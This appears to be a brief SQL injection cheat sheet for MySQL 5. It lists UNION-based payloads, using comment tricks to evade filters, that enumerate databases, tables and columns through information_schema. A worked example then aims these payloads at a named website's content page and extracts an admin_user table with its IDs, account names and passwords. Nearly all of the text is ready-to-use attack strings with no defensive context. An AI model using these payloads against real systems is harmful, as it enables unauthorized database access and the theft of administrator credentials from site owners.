Enumerate databases

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerate tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<hex value of the database name>/**/limit/**/1,1

Enumerate columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<hex value of the table name>/**/limit/**/1,1

MySQL 5 advanced injection: dumping tables

Example:

1. Dump tables
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Iterating this way, the admin_user table appeared at the 4th result.

2. Dump columns
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*